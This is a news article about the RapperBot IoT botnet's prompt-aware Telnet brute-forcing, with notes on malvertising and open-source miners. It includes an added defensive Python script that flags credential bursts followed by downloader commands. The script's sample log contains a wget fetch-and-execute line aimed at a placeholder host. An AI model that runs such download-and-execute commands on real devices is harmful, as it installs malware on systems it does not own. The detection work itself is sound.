
This New Mirai Variant Uses Peculiar Malware Distribution Methods


RapperBot, a new Mirai variant, is the latest example of malware spreading through relatively uncommon or previously undiscovered infection channels. RapperBot first appeared last year as Internet of Things (IoT) malware that reused large amounts of Mirai source code but had significantly different capabilities from other Mirai variants. The differences included a new command-and-control (C2) protocol and built-in functionality for brute-forcing SSH servers rather than Telnet services, as is usual in Mirai variants.

Fortinet researchers who tracked the malware last year observed its authors continually changing it, first by adding code to maintain persistence on infected machines even after a reboot, and then by inserting code for self-propagation through a remote binary downloader. The malware authors later removed the self-propagation feature and replaced it with one that gave them persistent remote access to brute-forced SSH servers.

Kaspersky researchers detected a new RapperBot variant circulating in the wild in the fourth quarter of 2022, in which the SSH brute-force functionality had been removed and replaced with capabilities for targeting Telnet servers.

According to Kaspersky's analysis of the malware, it also had an "intelligent" and relatively unusual approach to brute-forcing Telnet. Rather than brute-forcing with a large number of credentials, the malware examines the prompt it receives when it connects to a device over Telnet and, based on that, selects the appropriate set of credentials for the brute-force attempt. Compared with many other malware families, this greatly speeds up the brute-forcing process, Kaspersky says.

"When you telnet to a device, you typically get a prompt," explains Jornt van der Wiel, a senior security researcher at Kaspersky. In RapperBot's case, the prompt can expose certain information that the malware uses to determine which device it is attacking and which credentials to use.

RapperBot uses different credentials depending on the IoT device being attacked, he says. "So, for device A, it uses user/password set A; and for device B, it uses user/password set B," van der Wiel explains.

The malware then uses commands such as "wget," "curl," and "ftpget" to download itself onto the target system. If none of these methods works, the malware downloads and installs itself on the device, according to Kaspersky.

RapperBot's brute-force method is unusual, and van der Wiel says he cannot think of any other malware variants that use it. Nonetheless, given the vast number of malware samples in the wild, it is impossible to say whether this is the only malware currently employing this strategy.
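From a defender's side, the chain described above (a device prompt is served, a short burst of credential attempts follows, then a post-login "wget"/"curl"/"ftpget" command) is what a Telnet honeypot or device log should be watched for. The following is an added detection example written for this post; it is not code from the article, from Kaspersky, or from the malware. The log format it parses is hypothetical and the sample lines are constructed (addresses come from the RFC 5737 documentation ranges); the 30-second window and the threshold of three failures are assumptions to tune against your own logs.

```python
"""Added example (not from the article or Kaspersky): flag Telnet sessions that
show prompt-driven credential bursts followed by a download-and-run command."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in a hypothetical telnetd log format.
SAMPLE_LOG = """\
2023-04-12 10:00:01 telnetd[411]: 203.0.113.7 PROMPT BusyBox v1.19 login:
2023-04-12 10:00:02 telnetd[411]: 203.0.113.7 AUTH_FAIL user=root
2023-04-12 10:00:02 telnetd[411]: 203.0.113.7 AUTH_FAIL user=admin
2023-04-12 10:00:03 telnetd[411]: 203.0.113.7 AUTH_FAIL user=support
2023-04-12 10:00:04 telnetd[411]: 203.0.113.7 AUTH_OK user=admin
2023-04-12 10:00:05 telnetd[411]: 203.0.113.7 CMD cd /tmp; wget http://198.51.100.9/x.arm -O x; chmod +x x; ./x
2023-04-12 10:07:30 telnetd[412]: 198.51.100.20 PROMPT BusyBox v1.19 login:
2023-04-12 10:07:41 telnetd[412]: 198.51.100.20 AUTH_OK user=admin
2023-04-12 10:07:55 telnetd[412]: 198.51.100.20 CMD uptime
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) telnetd\[\d+\]: "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}) (?P<event>PROMPT|AUTH_FAIL|AUTH_OK|CMD)"
    r"(?: (?P<detail>.*))?$"
)
# The fetch tools the article names, plus tftp, which is common on BusyBox devices.
DOWNLOADERS = {"wget", "curl", "ftpget", "tftp"}


def parse_line(line):
    """Return a dict with ts/src/event/detail, or None for lines we don't understand."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
    rec["detail"] = rec["detail"] or ""
    return rec


def uses_downloader(cmd):
    """True if any command in a shell line (split on ; & |) is a known fetch tool."""
    tokens = re.split(r"[\s;&|]+", cmd)
    # Compare the basename so "/usr/bin/wget" counts as well as "wget".
    return any(tok.split("/")[-1] in DOWNLOADERS for tok in tokens)


def analyze(lines, window=timedelta(seconds=30), threshold=3):
    """Per source address: total failures, whether >= threshold failures landed
    within `window` of the last prompt (burst), and the first post-login command
    that invokes a downloader (or None)."""
    state = defaultdict(lambda: {"prompt_at": None, "fail_times": [], "logged_in": False,
                                 "failures": 0, "burst": False, "download": None})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        s = state[rec["src"]]
        ev = rec["event"]
        if ev == "PROMPT":
            # A fresh prompt starts a new measurement window.
            s["prompt_at"] = rec["ts"]
            s["fail_times"] = []
        elif ev == "AUTH_FAIL":
            s["failures"] += 1
            if s["prompt_at"] is not None and rec["ts"] - s["prompt_at"] <= window:
                s["fail_times"].append(rec["ts"])
                if len(s["fail_times"]) >= threshold:
                    s["burst"] = True
        elif ev == "AUTH_OK":
            s["logged_in"] = True
        elif ev == "CMD" and s["logged_in"] and s["download"] is None:
            if uses_downloader(rec["detail"]):
                s["download"] = rec["detail"]
    return {src: {k: s[k] for k in ("failures", "burst", "download")}
            for src, s in state.items()}


def suspicious_sources(findings):
    """Sources that show the full chain: credential burst, then a download command."""
    return sorted(src for src, f in findings.items() if f["burst"] and f["download"])


if __name__ == "__main__":
    results = analyze(SAMPLE_LOG.splitlines())
    for src, f in results.items():
        print(src, f)
    print("suspicious:", suspicious_sources(results))
```

Real Telnet daemons and honeypots (Cowrie, for instance) each log in their own format, so the regex is the part to adapt; the per-source state machine and the "burst then fetch" rule carry over. The session from 198.51.100.20 in the sample logs in cleanly and runs "uptime", and is correctly left out of the suspicious list.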

New and Unusual Strategies

RapperBot is one example of malware that uses unusual and often previously unknown tactics to spread, according to Kaspersky. Another example is "Rhadamanthys," an info stealer offered as malware-as-a-service on a Russian-language cybercriminal forum. It is one of an increasing number of malware families that threat actors distribute using malicious ads.

On online ad platforms, adversaries plant malware-laden ads or ads that link to phishing sites. Often the ads are for legitimate software products and include keywords that ensure they appear high in search engine results or when users visit specific websites. In recent months, threat actors have used such malvertisements to target users of popular password managers such as LastPass, Bitwarden, and 1Password.

The increasing success threat actors are having with malvertising is driving up use of the strategy. For example, the authors of Rhadamanthys used phishing and spam emails as initial infection vectors before turning to malicious ads.

"Rhadamanthys does nothing different than other malvertising campaigns," van der Wiel explains. "It is, however, part of a trend that we see malvertising becoming more popular."

Another trend Kaspersky identified is the increased use of open-source malware by less-skilled attackers. Consider CueMiner, a downloader for coin-mining malware that is available on GitHub. Attackers distributed the malware using Trojanized copies of cracked software downloaded over BitTorrent or OneDrive sharing networks, according to Kaspersky researchers.

"Due to its open source nature, everybody can download and compile it," van der Wiel explains. "As these users are typically not very advanced cybercriminals, they have to rely on relatively simple infection mechanisms, such as BitTorrent and OneDrive."